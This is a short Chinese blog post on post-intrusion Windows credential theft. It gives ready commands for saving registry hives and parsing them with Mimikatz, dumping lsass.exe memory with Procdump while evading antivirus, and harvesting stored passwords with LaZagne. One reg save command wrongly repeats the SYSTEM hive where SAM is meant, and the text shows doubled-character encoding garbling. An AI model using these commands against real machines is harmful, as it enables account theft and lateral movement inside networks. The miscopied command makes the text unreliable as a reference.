內(nèi)網(wǎng)滲透-密碼抓取

Mimikatz

Mimikatz又被稱為法國(guó)大面包,是一款windows平臺(tái)的神器,他最顯著的功能就是從lsass.exe中抓取密碼,此外它還可以用于提權(quán)、注入進(jìn)程,讀取進(jìn)程內(nèi)存等操作。但是Mimikatz沒有經(jīng)過(guò)處理直接扔到服務(wù)器上,200%會(huì)被殺軟殺掉。因此,我們需要通過(guò)別的手段去抓取數(shù)據(jù)到本地。

下載地址:https://github.com/gentilkiwi/mimikatz/releases

通過(guò)注冊(cè)表抓取

獲取注冊(cè)表中的信息:

reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv
reg save HKLM\SYSTEM c:\windows\temp\Sam.hiv

執(zhí)行這兩條命令需要管理員權(quán)限

把這兩個(gè)文件拉取到本地,執(zhí)行命令:

mimikatz "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" exit

lsass.exe內(nèi)存抓取

如果有一些賬號(hào)登錄本機(jī),如域管理員等,這些登錄信息會(huì)被儲(chǔ)存在lsass.exe這個(gè)進(jìn)程中,通過(guò)內(nèi)存抓取可以獲得這些信息。
用到的工具:Procdump,此工具有微軟的官方簽名,大部分的殺軟都不會(huì)查殺
下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/
將對(duì)應(yīng)的Procdump上傳到服務(wù)器中,執(zhí)行

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

將生成的dmp文件拉到本地,執(zhí)行命令

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

在windows 2008前密碼都是明文存儲(chǔ),在2008之后系統(tǒng)會(huì)進(jìn)行hash加密再存儲(chǔ)

LaZagne

下載地址 http://github.com/AlessandroZ/LaZagne
下載源碼,并按照github上的說(shuō)明安裝一些模塊,在python3下的環(huán)境運(yùn)行

python3 laZagne.py all 

LaZagne可以抓取多種在計(jì)算機(jī)中儲(chǔ)存的密碼,如vnc、瀏覽器存儲(chǔ)的密碼、數(shù)據(jù)庫(kù)密碼、Hashdump等。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容